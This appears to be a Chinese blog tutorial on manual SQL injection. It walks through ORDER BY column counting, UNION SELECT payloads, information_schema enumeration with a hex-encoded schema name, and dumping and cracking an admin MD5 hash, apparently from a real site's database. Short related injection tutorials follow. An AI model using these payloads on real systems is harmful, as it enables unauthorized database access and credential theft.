sql 注入手工實現二

2022-03-01 12:42:38 字數 1798 閱讀 3995

這一節沒有什麼用,就是用來熟悉命令的

目標:1.order by 18-- 訂購18-- //**存在18個表

2.聯合查詢,判斷可回顯資料位置,結果,可回顯位置為2,9,14

3.user()檢視當前使用者,version()檢視版本,database()檢視庫名

當前使用者為root使用者具有最高許可權

當前資料庫為2011_xingguang

4.檢視管理表and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,

from information_schema.tables where table_schema=0x323031315f78696e676775616e67

table_schema=庫名的16進製制

這裡我們看到當前表名為ym_admin

5.檢視admin表列名

仍然是後面新增limit 逐個檢視,的到0--7列名為aid,userid uname pwd usertype email addtime addip

4.爆破管理員賬戶密碼

從ym_admin中選擇1,pwd,3,4,5,6,7,8,userid,10,11,12,13,14,15,16,17,18--爆管理員賬戶密碼

b7a782741f667201b54880c925faec4b可以看出來是32位,採用md5加密,我們解密,密碼10000

常見管理表命名方式:關鍵字

系統登入使用者admin

config.asp裡

db.asp

con.asp

config.php檔案

sql注入 手工注入

表示式 描述union 將查詢結果進行聯合輸出,追加在列尾 union all load 檔案讀取 into outfile 檔案寫入 datadir 資料庫檔案存放路徑 user 當前使用者 version 資料庫版本 database 資料庫名稱 表示系統變數 資料庫 表名描述 informat...

SQL注入(手工篇)

開發人員在開發web系統時對輸入的資料沒有進行有效的驗證及過濾,就存在引發sql注入漏洞的可能,並導致檢視 插入 刪除資料庫的資料,甚至可以執行主機系統命令。1.可能出現asp?id x的 2.漏洞測試 1 單引號測試 在頁面中執行命令時使用成對單引號和單個單引號進行測試,檢視是否有sql注入 2 ...

SQL注入之Access注入 (手工)

尋找注入點 首先呢,在 中尋找傳遞引數的頁面,也就是尋找注入點。判斷注入 找到頁面 注入點 之後呢,我們需要判斷當前頁面是否存在注入 傳統的方法是 語句狀態 鏈結後面加 報錯and 1 1 正常and 1 2 報錯or 1 2 正常or 1 1 報錯或者跳轉到另外乙個頁面 我們不使用傳統的方法,因為...